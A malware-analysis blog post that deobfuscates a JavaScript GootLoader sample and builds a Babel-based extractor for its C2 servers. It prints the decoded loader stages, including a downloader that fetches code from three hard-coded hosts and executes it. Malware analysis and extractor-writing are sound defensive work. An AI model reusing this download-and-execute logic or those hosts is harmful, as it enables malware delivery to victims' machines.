In this blog post, I will describe how I wrote a config extractor for an obfuscated JavaScript-based GootLoader component. The hard part of automating the config extraction is the obfuscation: the C2 servers are just plain text in the last stage. All code is on GitHub if you are just interested in that.
# Intro
A fellow Cyberian, struppigel, recently released Samplepedia, a platform where people can drop SHA256 hashes of files with a description, an analysis goal, and some other metadata. My understanding is that the goal is to finally have a place to find interesting malware to analyze, a question I get asked a lot when teaching reverse engineering.
Naturally I picked a task myself and decided to do one involving JavaScript, something I don't have a lot of exposure to as a reverse engineer (I do have some exposure to it as a forward engineer, but that's a different story). The sample in question is
1bc77b013c83b5b075c3d3c403da330178477843fc2d8326d90e495a61fbb01f and the task is:
> Create a static C2 extractor that uses abstract syntax tree transformations with Babel. You can use astexplorer.net as helper tool.
I was particularly intrigued because I've recently seen other people be extremely successful leveraging "normal dev tooling" in the JavaScript ecosystem to tackle challenges with JavaScript-based malware.
# First Pass
Before we automate anything, let's take a look and see how far we can get manually. The sample contains around 10,000 lines of code (LoC) and basically looks like a bunch of concatenated JavaScript libraries. I did what I often do and just started scrolling. I don't know if I'm the only one who does that, but sometimes I scroll for minutes over text to see if my pattern matching picks anything up. I honestly also don't know how reliable or reproducible this is and I also don't know how much I missed with this approach. Ignorance is bliss.
Anyway, through some freak accident (I guess), I stopped at the following code fragment:
function north0(rich6, effect8, under2, connect5){
choose84[6014455]=slave2;
yet7[point55] = world3[yet7[enemy7]];
}
And that cracked the case wide-open. world3 seems to be important, so I CTRL-Fed myself through the file and found the following additional fragments:
function general3(game7, east8, subject1){
year1=use45;
seven6=6691;
eight5(82873);
while(world3=world3){
try{choose84[seven6](seven6);
}catch(is8){
choose84[1942717]=world3;
}seven6++
}
}
and
// Fix IE bugs, see support tests
function world3(an800, flow8, dance5){
enemy7=0;
twenty3='\".(e+n) \"oR{\"i( +t)W\"aUSCi\"c(c+r)o\"i_s';cover3='+ )w\"}T\\\"\"( +,)}\"\\N\"E \"g(e+r)l\"oRs';race3='+)e7)\"p\\\\3\"Gl5e\"a\\S8c(.1e(2\"(\\Ln/;\\e\"}(p( \\o\\t+.dr)f{y\\ \"{2\'M';lay5='\"\\\\\"e(D,j]O x)\"0\\\\g\"))zr+)mt(=v\\\"\"\\=x(M-n+A1';ship5='.)u\"aSiUh\"t(l+().\")_w\";(w';bird8='7ek2nka3ba;4)l\"5l.l)ewh;Sw';read6='{ )+tj\")\\ =\\T\"t=Ev+ \"r\\u\"\\\\\"(.4(+r1';noon0='etjgTabsecO(x}e(t t\";\\a; %e)';roll6='0)pi))i .\\}\"E{ (x ;+pve)aas\\n\"lr';family8=').\"f\"f( +r){\"oe tmi)rCW3';moon2=';\"p( +m)y\"iee\"s(t+y)7\"eR';does1='7c;';mile9=' }5WeSpcarhisp;t5.1s1l2e=eapz(l7i2f3z0';huge68='dra EcfunS v\\n\"i=r(r u+oft';they7='er oj;(5b7Q-O8)7e= lt;{)a) \"e\"r(r+e)C\"t';season506='5peipaahhrsw s{ e);eI(0hnc tta=c( ';fun0='\\Oef)fsi+(l (\\a\"\";\\@f)N\\ \"S2,+\"+\\tt8)++9+\\\"\"\\,(@=2';prove63='3toE2st\")\\.\";\\)) ((+}+m( )';cut3=')n.e\\m\"rreW en\\{\"ts)(Spe(to(trnhciscen';instrument3='euth\"s\\Sa )\\t\"+=s((=.+\"=\\)f l\\(\"l2 .\"0\\tf';sound8='. twp}i\\r\"c S[Wi\" (+t=c+e j;bMO}e\'t)a)e(';right2='S\\,\\c\"\\+\")r\"e\"i(k+p).\"tRoE.\"c(Q+';arrive5='Z.Su_tGrEpRn\"i( r,S\"c\"t S,r7Wkin anb=(g] ';felt6='o\"e\\d\"l\\nRseaDetr\" \\./{)h\" \\t+u(a( +M\"=';egg3='(}1Xr)a\\e\"y/((]gl+[,7)t';wash0=')\\(\"\"+\\+\")\\t:\\M\"s+AHp\\\"\"\\Lt@)M\"\\\\\"+\\(\"(,+(\"\\\\\")+I\\\"\"\\)N)t\\%\"h;\"X\\ \"r\\v)e(a)\\ \" r,(';went4='\\ ] N=iuS [.\"t\\rM )e+;+p))(l\")\\a\"\\\\\"/cDP/eOT\"(\\T\"\\\\\"(\\)\"+@+(';war4='j1k6H7z9m8t)u;jswvrlortfcbucr=tysento';fear8='iUr(fSCd E.n(\"t\\(ep)usi+..r(ifc\"n\\S dRW;eD()x\" ';differ5='[\"c(3[i5]erp(ashjse ){l (y.r)tw;;\"w\\ \\wHWG\\T\"Z';page8='\"md3\"o(0+c))\".a;esR \"t(}+r))\"og';wheel7=' }Q i;,) 71k;n0a]b)(\\]\")+';stop9='\"p(s+t)a\".YtEs\"r(l+a)e\"dKeHn\"p(a (=l 1';thus1='\")\\r%\\+\"\"i\\u)p)s\"t\\\\)\"p. 
(hs![\"l\\)=e(( e+g(p)n\"(\\i\"2\\r%3ptU2.SS';help0='r)C;.}tcpaitrcchS(We )={';lead99=' e\\y\"{f SyurMtn}\\;\"0c9(=t2(liatnoicgni';build7='r)\")\\\\k\") os+{cb( a\\\"\"\\Wn(IS?+Nc';join7='\"h( +a)<\"rg \"C(i+o)(\"de Re\"e(([l';similar6 = prove63+felt6+went4;oxygen1 = moon2+differ5+right2+ship5;run0 = instrument3+roll6+huge68+cut3;dream6 = cover3+twenty3;map5 = does1;plural6 = build7+thus1;milk0 = noon0+fear8+fun0+lay5;house4 = race3+egg3+lead99+they7+arrive5;miss8 = family8+join7+season506+wheel7+page8;exact1 = wash0+read6;said7 = help0+mile9+war4;believe22 = stop9+bird8+sound8;finish7 = run0+milk0+plural6+similar6+exact1+house4+miss8+oxygen1+dream6+believe22+said7+map5;
choose84[3757113]=tree3;
eight5(9488);
}
This cracks the case wide open.
Still holding off on automation, I continued the manual work for now: after adding a newline after every ; and fixing some indentation, one can easily see that finish7 contains the result of the above string concatenation. CTRL-F-ing a bit further, the function use45 receives that variable and looks like this:
function use45(able3) {
opposite3 = enemy7;
enter7 = "";
while (opposite3 < 2704) {
good29 = pound6(able3, opposite3);
enter7 = strong52(enter7, good29, opposite3);
opposite3++;
}
return enter7;
}
It calls a couple of other functions. After some careful copying and pasting, I renamed that function to deobfuscate; together with all its dependencies, it looks like this:
function isOdd(offset) {
return offset % 2;
}
function getSingleAt(s, offset) {
return getAt(s, offset, 1);
}
function getAt(s, offset, len) {
return s.substr(offset, len);
}
function addLeftOrRight(currentRet, currentChar, currentOffset) {
return isOdd(currentOffset) ? currentRet + currentChar : currentChar + currentRet;
}
function deobfuscate(payload){
let ret = "";
for(let i = 0; i < 2704; i++) {
ret = addLeftOrRight(ret, getSingleAt(payload, i), i);
}
return ret;
}
We will further simplify this later in this blog post.
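To get a feeling for the scheme, here is a small sketch that includes the inverse direction as well. `decode` mirrors the cleaned-up `deobfuscate` above, except that it uses the payload length instead of the hard-coded 2704. `encode` is a hypothetical helper added purely for illustration; nothing like it appears in the sample.

```javascript
// Decode: characters at odd offsets are appended, characters at even
// offsets are prepended (same logic as deobfuscate, minus the fixed length).
function decode(payload) {
  let ret = "";
  for (let i = 0; i < payload.length; i++) {
    const c = payload[i];
    ret = i % 2 ? ret + c : c + ret;
  }
  return ret;
}

// Encode (hypothetical inverse, illustration only): the first half of the
// plaintext lands reversed on the even offsets, the rest on the odd offsets.
function encode(plain) {
  const half = Math.ceil(plain.length / 2);
  const evens = plain.slice(0, half).split("").reverse();
  const odds = plain.slice(half).split("");
  let payload = "";
  for (let k = 0; k < half; k++) {
    payload += evens[k] + (odds[k] ?? "");
  }
  return payload;
}

console.log(decode("abcdef")); // "ecabdf"
console.log(decode(encode("WScript.Shell"))); // "WScript.Shell"
```

Seen this way, the obfuscated strings are just the plaintext split in the middle, with the first half reversed and both halves interleaved.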
Since I now have this JavaScript code, I decided to just put the content of finish7 into the deobfuscate function and console.log it. Out comes the following second stage:
constructorwjutmzHkjzfilza=2115;shape5 = WScript.CreateObject("WScript.Shell");bank7 = ("HK")+("EY")+("_")+("CU")+("R")+("R")+("EN")+("T")+("_")+("US")+("ER")+("")+"\\ZTGH\\";try { shape5[("R")+("e")+("g")+("Rea")+("d")](bank7); } catch(e) { shape5[("Re")+("g")+("Write")+("")](bank7, "", ("REG_SZ")+(""));l=78-75;original2=90;}try {yet7[l](year1('{ yfr.to p}e;n\"(1(8\"5G3\"7)1+4(\"\"+EtT=\"t){, )()\"\"h%tN\"I)\"+((+\")t\"pAsM:\"\"()++)(\"\"O/D/\"\"()++)M\"[SiN]\"+((+\")/\"tDeR\"\")(++()\"\"sEtS.Up%\"\")(+ (=\"!h p)\"))\"+%\"N?In\"a(c+o)k\"rAnMx\"v(m+z)g\"xOjDe\"=(\"++)t\",S Nf\"a(l+s)e\")D;R \"f(.+s)e\"nEdS(U)%;\" (}(csagtncihr(teS)t{n ermentourrinv nfEadlnsaep;x E}. )i)f\" l(lf\".(s+t)a\"teuhsS \"=(=+=) \"2.0t0p)i \"{( +v)a\"rr cuS \"=( +f).\"rWe\"s(p(otncseejTbeOxett;a eirfC .(t(pui.ricnSdWe(x Offi( \";@)\"2++t8+9\",@2\"(,] )0\")r)t=\"=(-+1))\" s{b \"W(S+c)r\"iupst\".(s[l)e(egpn(i2r3t2S3o2t).;) (}m oedlnsaer .{h tua M= =u .tr e;p)l)a\"cPeT(T\"\"@(\"++)t\"+H\"L@M\"\",(\"+\"))\";X rvea\"r( +j) \"=v ru\".(r+e)p\"leaSc.e2(L/\"((\\+d){\"2M}X)\"/(g+,) \"fSuMn\"c(t(itocne j(bQO)e t{a erreCt.utrpni rSctSrWi n=g .ff r{o m)C3h a<r Cio(d ee(lpiahrws e;I0n t=( Qi, 1;0])\"+m3o0c).;s t}r)o;p myiesty7e[c3i]r(sje)l(.)w;w wW\"S,c\"reikp.to.cQ.uaihtl(.)w;w w}\" ,}\" gerlos.en o{i tWaSiccroispsta.tsrlaedenpa(l1e2k3a4l5.)w;w w}\" [i +=+ ;M}'))();}catch(e){}WScript.sleep(723016798);svlrfbc=yet7;
This seems to employ a couple of anti-analysis techniques:
* Splitting of string into concat operations with +.
* A sleep operation (which isn't really a problem for us because we are approaching this mainly statically).
Let's note that down for the automation later and keep going. I am working under the assumption that this code is evaluated in the context of the first stage (formally, we haven't confirmed that yet). And under this assumption, it calls a function year1 which must be defined there. And indeed it is:
year1 = use45;
Our good old friend use45 which we renamed to deobfuscate. So let's ignore all the anti-analysis techniques and extract a third stage from it:
M = ["www.lakelandartassociation.org","www.lha.co.ke","www.lesriceysimports.com"]; i = 0; while (i < 3) { f = WScript.CreateObject(("MS")+("XM")+("L2.Se")+("rv")+("erX")+("MLH")+("TTP")); t = Math.random().toString()[("su")+("bs")+("tr")](2,98+2); if (WScript.CreateObject(("W")+("Scr")+("ipt.")+("She")+("ll")).ExpandEnvironmentStrings(("%USE")+("RD")+("NS")+("DO")+("MA")+("IN%")) != ("%USE")+("RD")+("NS")+("DO")+("MA")+("IN%")) {t=t+"4173581";} try{ f.open(("G")+("ET"), ("ht")+("tps:")+("//")+M[i]+("/te")+("st.p")+("hp")+"?nacokrnxvmzgxje="+t, false); f.send(); }catch(e){ return false; } if (f.status === 200) { var u = f.responseText; if ((u.indexOf("@"+t+"@", 0))==-1) { WScript.sleep(23232); } else { u = u.replace("@"+t+"@",""); var deobfuscated = u.replace(/(\d{2})/g, function (Q) { return String.fromCharCode(parseInt(Q,10)+30); }); yet7[3](deobfuscated)(); WScript.Quit(); } } else { WScript.sleep(12345); } i++;}
Endorphins go brrr: we found something that looks like a C2 server. This seems to leverage the same obfuscation techniques as before. There's a tiny 98+2 in there, but it might not even be worth combating that because we didn't see it before.
Let's now look at automating the deobfuscation and C2 extraction with Babel, because that's why we are here. And this is where my analysis took an unexpected turn.
# Automation
Googling around, it quickly became clear that the workflow is roughly like this:
* Create a package.json and install the CLI variant of Babel
* Write a deobfuscation script that reads the target sample into memory
* Use Babel to construct an AST and transform that AST into what we consider "simpler"
* Generate JavaScript code from that AST that is (hopefully) easier to read.
This was the JavaScript boilerplate I cobbled together from blog posts doing something similar:
const parser = require("@babel/parser");
const generate = require("@babel/generator").default;
const traverse = require("@babel/traverse").default;
const types = require("@babel/types");
const fs = require('fs');
const code = fs.readFileSync(process.argv[2], "utf-8");
let ast = parser.parse(code);
traverse(ast, { /* this is where the transformation will happen */});
console.log(generate(ast).code);
So far so good. I prepared myself for a night or two of reading Babel docs but then thought about synthesizing the code that will synthesize the code. So I headed over to a random LLM chat box and asked:
> I want to write a babel transformer for the following JavaScript snippet: s = ("MS")+("XM")+("L2.Se")+("rv");. How can I extend the following boilerplate code to do just that?
And I pasted the script from above into the prompt. The LLM did quite a good job explaining how Babel works in this case and what the JavaScript AST looks like (which I could also confirm with https://astexplorer.net/), and it also suggested some lines of code that fold the strings together:
traverse(ast, {
BinaryExpression(path) {
const { node } = path;
if (node.operator !== "+") return;
if (
types.isStringLiteral(node.left) &&
types.isStringLiteral(node.right)
) {
const folded = node.left.value + node.right.value;
path.replaceWith(types.stringLiteral(folded));
}
},
});
And I have to confess: this is insanely useful. It was trivial for me now to confirm that it behaved as expected and then it hit me: I can just describe other obfuscation techniques in the same context window and the LLM will just continue to generate easy-to-verify code that defeats them. And that's what I did. It's obviously extremely useful to be able to read and write JavaScript and to have a basic understanding of how AST modification _should_ work (visitor pattern and all that jazz). But this saved me days of painstakingly reading documentation that might not even apply to my case.
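A side note on the folding visitor: a chain like ("MS")+("XM")+("L2.Se")+("rv") nests to the left, so at first only the innermost + has a string literal on both sides. The following dependency-free sketch works on a hand-built AST with Babel's node shapes (no Babel involved, all helper names are made up) and folds children before parents, so the whole chain collapses in one go. In Babel terms this would presumably correspond to doing the work in the visitor's `exit` handler or to re-running the traversal; treat that as an assumption and not as a description of the code in the repository.

```javascript
// Hand-written AST for ("MS")+("XM")+("L2.Se")+("rv"). "+" is
// left-associative, so the chain nests to the left.
const str = (value) => ({ type: "StringLiteral", value });
const plus = (left, right) => ({
  type: "BinaryExpression",
  operator: "+",
  left,
  right,
});
const ast = plus(plus(plus(str("MS"), str("XM")), str("L2.Se")), str("rv"));

// Post-order folding: simplify both operands first, then the node itself.
function foldStrings(node) {
  if (node.type !== "BinaryExpression" || node.operator !== "+") return node;
  const left = foldStrings(node.left);
  const right = foldStrings(node.right);
  if (left.type === "StringLiteral" && right.type === "StringLiteral") {
    return str(left.value + right.value);
  }
  // Not fully foldable (e.g. a variable is involved): keep the "+" node
  // but with whatever could be simplified below it.
  return { ...node, left, right };
}

console.log(foldStrings(ast).value); // "MSXML2.Serv"
```

Expressions that mix literals and variables, like the URL built from M[i] in the third stage, are only folded as far as the literals reach.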
There is a case to be made for reading such documentation, i.e. parts that you don't need right now. Maybe you will gain context and better and deeper understanding of the technology. But I'm a grown-up now and I can say something based on, you know, life experience. And that is the following: I don't retain a lot of knowledge when I don't apply it. The LLM basically helped me focus on retrieving knowledge that I can actually apply and at least right now I feel that I've learned a couple of things about Babel and how it works.
Anyway, I asked the LLM for the following features and then cleaned the result up a bit:
* string folding
* newlines after ;
* removal of comments
* replacing a["substr"] with a.substr
* constant folding (because it was basically free at this point)
And under default configuration, Babel also outputs a beautified version of the script.
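Two of the items from the list can be sketched on single nodes. The node shapes follow Babel's AST (MemberExpression with a `computed` flag, NumericLiteral), but the helper names are hypothetical and this is not the code from the repository. Only + is folded here; the identifier check is a simplified ASCII-only version.

```javascript
// Simplified check for "can be written after a dot".
const isIdentifierName = (s) => /^[A-Za-z_$][A-Za-z0-9_$]*$/.test(s);

// a["substr"] -> a.substr, only when the key is a plain identifier name.
function dotify(node) {
  if (
    node.type === "MemberExpression" &&
    node.computed &&
    node.property.type === "StringLiteral" &&
    isIdentifierName(node.property.value)
  ) {
    return {
      ...node,
      computed: false,
      property: { type: "Identifier", name: node.property.value },
    };
  }
  return node;
}

// 98+2 -> 100 (addition of two numeric literals only).
function foldNumbers(node) {
  if (
    node.type === "BinaryExpression" &&
    node.operator === "+" &&
    node.left.type === "NumericLiteral" &&
    node.right.type === "NumericLiteral"
  ) {
    return { type: "NumericLiteral", value: node.left.value + node.right.value };
  }
  return node;
}

const member = {
  type: "MemberExpression",
  object: { type: "Identifier", name: "t" },
  property: { type: "StringLiteral", value: "substr" },
  computed: true,
};
const sum = {
  type: "BinaryExpression",
  operator: "+",
  left: { type: "NumericLiteral", value: 98 },
  right: { type: "NumericLiteral", value: 2 },
};

console.log(dotify(member).property.name); // "substr"
console.log(foldNumbers(sum).value); // 100
```

Keys that are not valid identifier names (for example a key containing a space) have to stay in bracket notation, which is why the check is there.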
# The Actual Task
This is all well and good but our actual task was to write a script to automatically extract the C2 server, not to make the manual analysis simpler. My approach here is this:
1. In the huge 10k LoC file, find the function with the most assignments and inline all variables in it
2. Execute the code deobfuscation steps from above
3. Find the longest string in the code and emulate the string deobfuscation function
4. Go to step 2 but with the result until we find an array with what looks like network indicators
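Step 3 of the list can be sketched without any Babel dependency: walk everything that looks like an AST node and remember the longest string literal. The function names below are hypothetical; the `extractLongestString` used later in this post may well be implemented differently.

```javascript
// Generic walk over a Babel-shaped AST: yield every object that carries a
// string `type` property, wherever it sits in the tree.
function* walk(node) {
  if (Array.isArray(node)) {
    for (const child of node) yield* walk(child);
  } else if (node && typeof node === "object") {
    if (typeof node.type === "string") yield node;
    for (const value of Object.values(node)) yield* walk(value);
  }
}

// Return the value of the longest StringLiteral, or null if there is none.
function longestString(ast) {
  let longest = null;
  for (const node of walk(ast)) {
    if (
      node.type === "StringLiteral" &&
      (longest === null || node.value.length > longest.length)
    ) {
      longest = node.value;
    }
  }
  return longest;
}

// Tiny hand-built AST for: year1("short", "a much longer payload");
const demoAst = {
  type: "Program",
  body: [
    {
      type: "ExpressionStatement",
      expression: {
        type: "CallExpression",
        callee: { type: "Identifier", name: "year1" },
        arguments: [
          { type: "StringLiteral", value: "short" },
          { type: "StringLiteral", value: "a much longer payload" },
        ],
      },
    },
  ],
};

console.log(longestString(demoAst)); // "a much longer payload"
```

The heuristic works for this sample because, after string folding, the next stage is by far the largest literal in each layer.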
Since the code I wrote (or I should rather say "synthesized") had gotten a bit long by now, I wanted to refactor it: put everything related to JavaScript deobfuscation into one file and everything that is malware-specific into another. Since I'm _always_ getting it wrong with JavaScript (wrong file extensions, wrong mix of export default and module.exports, wrong style of imports...), I just asked the AI again to refactor it for me.
After that it was merely putting together what we collected:
const fs = require("fs");
const {
detectCandidateFunctions,
propagateAssignments,
extractLongestString,
extractStringArrayAssignments,
} = require("./otherTraversals");
const { runDeobfuscationTraversals } = require("./deobfuscationTraversals");
const { getCode, codeDeobfuscate, defang } = require("./utils");
function strDeobfuscate(payload){
let ret = "";
[...payload].forEach((c, i) => ret = i % 2 ? ret + c : c + ret);
return ret;
}
const hostRe = /^(?:(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}|(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(?:\.(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})$/;
const code = fs.readFileSync(process.argv[2], "utf-8");
const ast = codeDeobfuscate(code);
const candidateFunctionNames = detectCandidateFunctions(ast);
propagateAssignments(ast, candidateFunctionNames);
runDeobfuscationTraversals(ast);
let currentAst = ast;
let collectedC2s = [];
for(let i = 0; i < 20; i++) {
const longest = extractLongestString(currentAst);
if (!longest) break;
currentAst = codeDeobfuscate(strDeobfuscate(longest));
console.log(`------ STAGE ${i + 2} ------`)
for (const arr of extractStringArrayAssignments(currentAst)) {
if (arr.values.every(v => hostRe.test(v))) {
collectedC2s = arr.values;
break;
}
}
const synthCode = getCode(currentAst);
console.log(synthCode);
if (collectedC2s.length > 0) {
break;
}
}
if (collectedC2s.length > 0) {
console.log(`------ C2s ------`)
for (const c2 of collectedC2s) {
console.log(defang(c2));
}
} else {
console.log("No C2s found :-(");
}
Which generates the following satisfying output:
------ STAGE 2 ------
function __DEOBFUSCATED() {
constructorwjutmzHkjzfilza = 2115;
shape5 = WScript.CreateObject("WScript.Shell");
bank7 = "HKEY_CURRENT_USER\\ZTGH\\";
try {
shape5.RegRead(bank7);
} catch (e) {
shape5.RegWrite(bank7, "", "REG_SZ");
l = 78 - 75;
original2 = 90;
}
try {
yet7[l](year1('{ yfr.to p}e;n\"(1(8\"5G3\"7)1+4(\"\"+EtT=\"t){, )()\"\"h%tN\"I)\"+((+\")t\"pAsM:\"\"()++)(\"\"O/D/\"\"()++)M\"[SiN]\"+((+\")/\"tDeR\"\")(++()\"\"sEtS.Up%\"\")(+ (=\"!h p)\"))\"+%\"N?In\"a(c+o)k\"rAnMx\"v(m+z)g\"xOjDe\"=(\"++)t\",S Nf\"a(l+s)e\")D;R \"f(.+s)e\"nEdS(U)%;\" (}(csagtncihr(teS)t{n ermentourrinv nfEadlnsaep;x E}. )i)f\" l(lf\".(s+t)a\"teuhsS \"=(=+=) \"2.0t0p)i \"{( +v)a\"rr cuS \"=( +f).\"rWe\"s(p(otncseejTbeOxett;a eirfC .(t(pui.ricnSdWe(x Offi( \";@)\"2++t8+9\",@2\"(,] )0\")r)t=\"=(-+1))\" s{b \"W(S+c)r\"iupst\".(s[l)e(egpn(i2r3t2S3o2t).;) (}m oedlnsaer .{h tua M= =u .tr e;p)l)a\"cPeT(T\"\"@(\"++)t\"+H\"L@M\"\",(\"+\"))\";X rvea\"r( +j) \"=v ru\".(r+e)p\"leaSc.e2(L/\"((\\+d){\"2M}X)\"/(g+,) \"fSuMn\"c(t(itocne j(bQO)e t{a erreCt.utrpni rSctSrWi n=g .ff r{o m)C3h a<r Cio(d ee(lpiahrws e;I0n t=( Qi, 1;0])\"+m3o0c).;s t}r)o;p myiesty7e[c3i]r(sje)l(.)w;w wW\"S,c\"reikp.to.cQ.uaihtl(.)w;w w}\" ,}\" gerlos.en o{i tWaSiccroispsta.tsrlaedenpa(l1e2k3a4l5.)w;w w}\" [i +=+ ;M}'))();
} catch (e) {}
WScript.sleep(723016798);
svlrfbc = yet7;
}
------ STAGE 3 ------
function __DEOBFUSCATED() {
M = ["www.lakelandartassociation.org", "www.lha.co.ke", "www.lesriceysimports.com"];
i = 0;
while (i < 3) {
f = WScript.CreateObject("MSXML2.ServerXMLHTTP");
t = Math.random().toString().substr(2, 100);
if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {
t = t + "4173581";
}
try {
f.open("GET", "https://" + M[i] + "/test.php?nacokrnxvmzgxje=" + t, false);
f.send();
} catch (e) {
return false;
}
if (f.status === 200) {
var u = f.responseText;
if (u.indexOf("@" + t + "@", 0) == -1) {
WScript.sleep(23232);
} else {
u = u.replace("@" + t + "@", "");
var j = u.replace(/(\d{2})/g, function (Q) {
return String.fromCharCode(parseInt(Q, 10) + 30);
});
yet7[3](j)();
WScript.Quit();
}
} else {
WScript.sleep(12345);
}
i++;
}
}
------ C2s ------
www.lakelandartassociation[.]org
www.lha.co[.]ke
www.lesriceysimports[.]com
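The final filtering step is small enough to replay in isolation. The regular expression below is copied from the script above. `defangHost` is a hypothetical stand-in for the `defang` helper, which is not shown in this post; it is merely a guess that reproduces the output above by bracketing the last dot.

```javascript
// Same pattern as hostRe in the script: a dotted hostname or an IPv4 address.
const hostRe = /^(?:(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}|(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(?:\.(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})$/;

// Hypothetical defang: replace only the last dot with "[.]".
function defangHost(host) {
  return host.replace(/\.(?=[^.]*$)/, "[.]");
}

// An array only counts as a C2 list if every element looks like a host.
function looksLikeC2List(values) {
  return values.length > 0 && values.every((v) => hostRe.test(v));
}

const candidates = [
  ["REG_SZ", "WScript.Shell"],
  ["www.lakelandartassociation.org", "www.lha.co.ke", "www.lesriceysimports.com"],
];
for (const values of candidates) {
  if (looksLikeC2List(values)) {
    console.log(values.map(defangHost));
  }
}
```

One caveat: a string such as WScript.Shell satisfies the pattern on its own, so the heuristic leans on the fact that all elements of the array have to match.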
Quick comment: One thing one should do now, or rather, should have done a couple of paragraphs above: hunt for similarly obfuscated files or identify other similar GootLoader components. But I consider this out-of-scope for now. I'm here for the JavaScript and the Babel fun.
You can find the complete code on GitHub: https://github.com/larsborn/gootloader-babel-deobfuscator.
# Wait Malware! What does it do?
Since we printed the intermediate stages, we can now also describe the actual downloader stage a bit:
The downloader uses an MSXML2.ServerXMLHTTP object to perform up to three consecutive GET requests to the following hard-coded servers:
* www.lakelandartassociation[.]org
* www.lha.co[.]ke
* www.lesriceysimports[.]com
All those requests are made to the same script test.php. The script generates a random token and passes it in an additional GET parameter with the name nacokrnxvmzgxje. That token is extended by the string 4173581 iff the following expression is true:
WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%"
The variable %USERDNSDOMAIN% is populated for domain-joined machines and if that variable is not configured, ExpandEnvironmentStrings will just return its argument. So from the perspective of the operator, if the parameter ends in 4173581, the infected machine belongs to a Windows domain. Maybe they do this to identify high-value targets.
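The check can be modeled in plain JavaScript. The sketch below is a simplified model of ExpandEnvironmentStrings (case-sensitive names and a plain object as environment are assumptions made for brevity), and `buildToken` is a hypothetical name for the token logic of the third stage.

```javascript
// Simplified model: known %NAME% references are replaced, unknown ones are
// left untouched, which is the behavior the malware relies on.
function expandEnvironmentStrings(input, env) {
  return input.replace(/%([^%]+)%/g, (match, name) =>
    Object.prototype.hasOwnProperty.call(env, name) ? env[name] : match
  );
}

// Mirrors the third stage: append the marker only on domain-joined machines.
function buildToken(randomDigits, env) {
  const probe = "%USERDNSDOMAIN%";
  const domainJoined = expandEnvironmentStrings(probe, env) !== probe;
  return domainJoined ? randomDigits + "4173581" : randomDigits;
}

console.log(buildToken("123456", {})); // "123456"
console.log(buildToken("123456", { USERDNSDOMAIN: "CORP.EXAMPLE" })); // "1234564173581"
```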
The malware then searches for the above-generated token enclosed in @ characters in the response, removes it, deobfuscates the result, and executes it as JavaScript again. I was not able to retrieve any next-stage payloads by the time of analysis. So not really anything interesting to see here.
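Since no live payload was available, the response handling can only be replayed with made-up data. `decodeResponse` follows the logic of the third stage; `encodeResponse` is a hypothetical guess at what the server side would have to do and only works for characters with codes between 30 and 129.

```javascript
// Decoding as in the third stage: strip the @token@ marker, then turn every
// pair of digits into the character with code (pair + 30).
function decodeResponse(body, token) {
  const marker = "@" + token + "@";
  if (body.indexOf(marker) === -1) return null; // the sample sleeps and moves on
  return body
    .replace(marker, "")
    .replace(/(\d{2})/g, (pair) => String.fromCharCode(parseInt(pair, 10) + 30));
}

// Hypothetical inverse, for illustration only.
function encodeResponse(script, token) {
  const digits = script
    .split("")
    .map((c) => String(c.charCodeAt(0) - 30).padStart(2, "0"))
    .join("");
  return "@" + token + "@" + digits;
}

console.log(decodeResponse("@42@7475", "42")); // "hi"
console.log(decodeResponse(encodeResponse("WScript.Echo(1)", "42"), "42")); // "WScript.Echo(1)"
```

The token in the response ties each payload to one specific request, so a response without the expected marker is ignored.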
# Conclusion
Ok, let's talk about the elephant in the room, or should I say ailpehant 🥁. LLM-based coding was instrumental in writing the config extractor. I would have been able to learn everything I needed about Babel and then write it all by myself, but I assess the speed-up to be something like 5x or even much more. I sympathize with all the AI haters out there. And at the same time, I wouldn't realistically have written this blag post without LLMs.